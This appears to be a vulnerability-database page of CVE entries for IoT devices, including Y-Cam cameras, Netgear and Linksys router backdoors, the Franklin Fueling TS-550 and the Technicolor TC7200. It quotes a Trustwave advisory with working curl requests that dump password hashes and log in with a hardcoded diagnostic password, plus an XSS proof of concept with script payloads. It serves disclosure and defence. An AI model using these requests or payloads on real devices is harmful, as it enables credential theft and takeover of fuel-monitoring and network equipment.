Remote attackers can exploit this issue to gain access to sensitive information that may aid in further attacks.
Canon PIXMA MX722 is vulnerable; other versions may also be affected
| VAR-201505-0152 | CVE-2014-1900 | Multiple Y-Cam camera firmware authentication bypass vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Y-Cam camera models SD range YCB003, YCK003, and YCW003; S range YCB004, YCK004, YCW004; EyeBall YCEB03; Bullet VGA YCBL03 and YCBLB3; Bullet HD 720 YCBLHD5; Y-cam Classic Range YCB002, YCK002, and YCW003; and Y-cam Original Range YCB001, YCW001, running firmware 4.30 and earlier, allow remote attackers to bypass authentication and obtain sensitive information via a leading "/./" in a request to en/account/accedit.asp. Multiple Y-Cam camera firmware versions contain a vulnerability that allows authentication to be bypassed and sensitive information to be obtained. A third party may bypass authentication and obtain sensitive information via a request to en/account/accedit.asp that begins with "/./". The Y-Cam camera is a wireless network security surveillance camera system launched by Y-cam. Information disclosure vulnerabilities in several Y-Cam products allow remote attackers to bypass authentication and obtain sensitive information through a leading "/./" in a request to en/account/accedit.asp. Multiple Y-Cam Camera Models are prone to the following security vulnerabilities:
1. A directory-traversal vulnerability
2. Multiple denial-of-service vulnerabilities
3. Multiple HTML-injection vulnerabilities
An attacker can exploit these issues to perform unauthorized actions, bypass security restrictions, cause denial-of-service conditions, execute attacker-supplied HTML or JavaScript code in the context of the affected site, to steal cookie-based authentication credentials or gain access to sensitive information. Y-Cam camera models SD range YCB003 etc
| VAR-201505-0150 | CVE-2014-1901 | Multiple Y-Cam camera firmware denial of service (DoS) vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Y-Cam camera models SD range YCB003, YCK003, and YCW003; S range YCB004, YCK004, YCW004; EyeBall YCEB03; Bullet VGA YCBL03 and YCBLB3; Bullet HD 720 YCBLHD5; Y-cam Classic Range YCB002, YCK002, and YCW003; and Y-cam Original Range YCB001, YCW001, running firmware 4.30 and earlier, allow remote authenticated users to cause a denial of service (reboot) via a malformed (1) path parameter to en/store_main.asp, (2) item parameter to en/account/accedit.asp, or (3) emailid parameter to en/smtpclient.asp. NOTE: this issue can be exploited without authentication by leveraging CVE-2014-1900. Multiple Y-Cam camera firmware versions contain a vulnerability that allows service operation to be disrupted (reboot). A remotely authenticated user may disrupt service operation (reboot) via the following malformed parameters: (1) the path parameter to en/store_main.asp, (2) the item parameter to en/account/accedit.asp, or (3) the emailid parameter to en/smtpclient.asp. This issue can be exploited without authentication by exploiting CVE-2014-1900. The Y-Cam camera is a wireless network security surveillance camera system launched by Y-cam. A denial of service vulnerability exists in several Y-Cam products, allowing authenticated remote users to cause a denial of service. Multiple Y-Cam Camera Models are prone to the following security vulnerabilities:
1. A directory-traversal vulnerability
2. Multiple denial-of-service vulnerabilities
3. Multiple HTML-injection vulnerabilities
An attacker can exploit these issues to perform unauthorized actions, bypass security restrictions, cause denial-of-service conditions, execute attacker-supplied HTML or JavaScript code in the context of the affected site, steal cookie-based authentication credentials, or gain access to sensitive information. Y-Cam camera models SD range YCB003 etc. The vulnerability is caused by the fact that the en/store_main.asp file does not sufficiently filter the malformed 'path' parameter, the en/account/accedit.asp file does not sufficiently filter the malformed 'item' parameter, and the en/smtpclient.asp file does not sufficiently filter the malformed 'emailid' parameter.
| VAR-201505-0151 | CVE-2014-1902 | Multiple Y-Cam camera firmware cross-site scripting vulnerability |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
Multiple cross-site scripting (XSS) vulnerabilities in Y-Cam camera models SD range YCB003, YCK003, and YCW003; S range YCB004, YCK004, YCW004; EyeBall YCEB03; Bullet VGA YCBL03 and YCBLB3; Bullet HD 720 YCBLHD5; Y-cam Classic Range YCB002, YCK002, and YCW003; and Y-cam Original Range YCB001, YCW001, running firmware 4.30 and earlier, allow remote authenticated users to inject arbitrary web script or HTML via the (1) SYSCONTACT parameter to form/identityApply, as triggered using en/identity.asp; (2) PASSWD parameter to form/accAdd, as triggered using en/account/accedit.asp; (3) NTPSERVER parameter to form/clockApply, as triggered using en/clock.asp; (4) SERVER parameter to form/smtpclientApply, as triggered using en/smtpclient.asp; (5) SERVER parameter to form/ftpApply, as triggered using en/ftp.asp; or (6) SERVER parameter to form/httpEventApply, as triggered using en/httpevent.asp. Multiple Y-Cam camera firmware versions contain a cross-site scripting vulnerability. A remotely authenticated user may inject web script or HTML via the following parameters: (1) the SYSCONTACT parameter to form/identityApply, as triggered using en/identity.asp; (2) the PASSWD parameter to form/accAdd, as triggered using en/account/accedit.asp; (3) the NTPSERVER parameter to form/clockApply, as triggered using en/clock.asp; (4) the SERVER parameter to form/smtpclientApply, as triggered using en/smtpclient.asp; (5) the SERVER parameter to form/ftpApply, as triggered using en/ftp.asp; (6) the SERVER parameter to form/httpEventApply, as triggered using en/httpevent.asp. The Y-Cam camera is a wireless network security surveillance camera system launched by Y-cam. Multiple Y-Cam Camera Models are prone to the following security vulnerabilities:
1. A directory-traversal vulnerability
2. Multiple denial-of-service vulnerabilities
3. Multiple HTML-injection vulnerabilities
An attacker can exploit these issues to perform unauthorized actions, bypass security restrictions, cause denial-of-service conditions, execute attacker-supplied HTML or JavaScript code in the context of the affected site, steal cookie-based authentication credentials, or gain access to sensitive information. Y-Cam camera models SD range YCB003 etc. A cross-site scripting vulnerability exists in many Y-Cam products. The vulnerability is caused by the fact that the en/identity.asp file does not sufficiently filter the 'SYSCONTACT' parameter, the en/account/accedit.asp file does not sufficiently filter the 'PASSWD' parameter, the en/clock.asp file does not sufficiently filter the 'NTPSERVER' parameter, the en/smtpclient.asp file does not sufficiently filter the 'SERVER' parameter, the en/ftp.asp file does not sufficiently filter the 'SERVER' parameter, and the en/httpevent.asp file does not sufficiently filter the 'SERVER' parameter.
| VAR-201401-0728 | No CVE | Netgear DGN2000 Telnet Backdoor Unauthorized Access Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Netgear DGN2000 is a wireless router product.
The Netgear DGN2000 runs an undocumented Telnet service listening on TCP port 32764, and this service contains security vulnerabilities. Successful exploitation can lead to execution of arbitrary OS commands. Netgear DGN2000 is prone to an unauthorized-access vulnerability. This may aid in further attacks.
| VAR-201401-0295 | CVE-2013-7247 | Franklin Fueling Systems TS-550 evo firmware cgi-bin/tsaws.cgi information disclosure vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST. Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability.
Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks.
Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. Affects versions prior to 2.4.0.
Product description:
A fuel management system with a programmable interface used for inventory
and delivery management.
Finding 1: Insufficient Access Control
Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs
CVE: CVE-2013-7247
CWE: CWE-200
As the Guest user (the lowest privilege), a user can post the
cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the
usernames and password hashes (in DES format) for all users of the
application. Once dumped, they can be cracked and used to access
authenticated portions of the application.
#Request
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi
#Response
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
<DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
<ROLE_LIST>
<ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
<ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
<ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
</ROLE_LIST>
</CONFIGURATION></TSA_RESPONSE></TSA_RESPONSE_LIST>
Finding 2: Hardcoded Technician Credentials
Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs
CVE: CVE-2013-7248
CWE: CWE-798
The three primary users on the TS550 are roleGuest, roleUser, and
roleAdmin. Another user exists with additional access named roleDiag. This
user can access extra portions of the application such as the command line
interface, enable and disable SSH, as well as run SQL commands all from the
web interface. The CLI interface includes the ability to run engineering
and manufacturing commands. The password for roleDiag is the key (a value
returned with every POST request to tsaws.cgi) DES encrypted. This can be
done in Ruby:
$ irb
1.9.3p374 :001 > "11111111".crypt("aa")
=> "aaDTlAa1fGGC."
#Request
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST PASSWORD="aaDTlAa1fGGC."><TSA_REQUEST COMMAND="cmdWebCheckRole"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi
#Response (note the ROLE)
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-03-04T16:53:01Z" TIME_STAMP_LOCAL="2013-03-04T11:53:01" KEY="11111111" ROLE="roleDiag"><TSA_RESPONSE COMMAND="cmdWebCheckRole"></TSA_RESPONSE></TSA_RESPONSE_LIST>
The password can then be used to run various roleDiag commands. An attacker
can enable SSH, and since root's password is the same as roleAdmin, they
can completely compromise the device. However, Trustwave SpiderLabs have not verified this fix.
Revision History:
04/16/13 - Vulnerability disclosed to vendor
12/18/13 - Fix released on a limited basis by vendor
01/03/14 - Advisory published
References
1. http://www.franklinfueling.com/evo/
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
| VAR-201401-0296 | CVE-2013-7248 | Franklin Fueling Systems TS-550 evo firmware root privilege vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST. Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass the authentication mechanism and gain access to the vulnerable device.
Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A remote attacker can use this to gain root privileges and take full control of the device. Affects versions prior to 2.4.0.
| VAR-201401-0739 | No CVE | Appotech AX211 / AX215 8-bit SD Card Controller Firmware Upgrade Mechanism Code Execution Vulnerability |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
The Appotech AX211 / AX215 is a microcontroller device. The Appotech AX211 / AX215 8-bit SD card controller has a security vulnerability in its firmware upgrade mechanism. When an attacker sends a 'knock' command (CMD63 followed by 'A', 'P', 'P', 'O'), the controller enters firmware load mode, and an attacker with physical access to the memory card can execute arbitrary commands on the card.
| VAR-201401-0733 | No CVE | Unauthorized access vulnerabilities in multiple Linksys product backdoors |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Linksys is a division of Cisco Systems that sells home and small business networking products. Linksys was originally founded in 1988 and was acquired by Cisco in 2003. Although Linksys is best known for its broadband and wireless routers, it also produces Ethernet switching and VoIP devices as well as many other products.
Many Linksys products (including Linksys WAG200G, Linksys WAG320N, Linksys WAG54G2, Linksys WAG120N, Linksys WAP4410N) have unauthorized access vulnerabilities in their implementation. Attackers can use these vulnerabilities to execute commands on the affected device with administrator privileges. Multiple Routers are prone to an unauthorized-access vulnerability. This may aid in further attacks
| VAR-201401-0350 | CVE-2014-0620 | Technicolor TC7200 cross-site scripting vulnerability |
Related entries in the VARIoT exploits database: VAR-E-201401-0170 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Technicolor (formerly Thomson) TC7200 STD6.01.12 allow remote attackers to inject arbitrary web script or HTML via the (1) ADDNewDomain parameter to parental/website-filters.asp or (2) VmTracerouteHost parameter to goform/status/diagnostics-route. Affected parameters: (1) the ADDNewDomain parameter to parental/website-filters.asp and (2) the VmTracerouteHost parameter to goform/status/diagnostics-route. The Technicolor TC7200 is a next-generation wireless home gateway device.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Technicolor TC7200 STD6.01.12 is vulnerable. Technicolor (formerly Thomson) TC7200 is a modem and router product of the French Technicolor Group. The vulnerability comes from the parental/website-filters.asp script not correctly filtering the 'ADDNewDomain' parameter and the goform/status/diagnostics-route script not correctly filtering the 'VmTracerouteHost' parameter.
# Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities
# Google Dork: N/A
# Date: 02-01-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways/cable-modems-gateways/tc7200-tc7300
# Software Link: N/A
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-0620
#
# Proof of Concept:
#
#
## Persistent Cross Site Scripting:
#
# POST : http://<ip>/parental/website-filters.asp
# Parameters:
#
# WebFilteringTable 0
# WebFilteringChangePolicies 0
# WebFiltersADDKeywords
# WebFilteringdomainMode 0
# ADDNewDomain <script>alert('IT Nerdbox');</script>
# WebFiltersKeywordButton 0
# WebFiltersDomainButton 1
# WebPolicyName
# WebFiltersRemove 0
# WebFiltersADD 0
# WebFiltersReset 0
#
#
## Reflected Cross Site Scripting
#
# POST : http://<ip>//goform/status/diagnostics-route
# Parameters:
#
# VmTracerouteHost "><script>alert('IT Nerdbox');</script>
# VmMaxTTL 30
# VmTrIsInProgress 0
# VmTrUtilityCommand 1
#
# Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/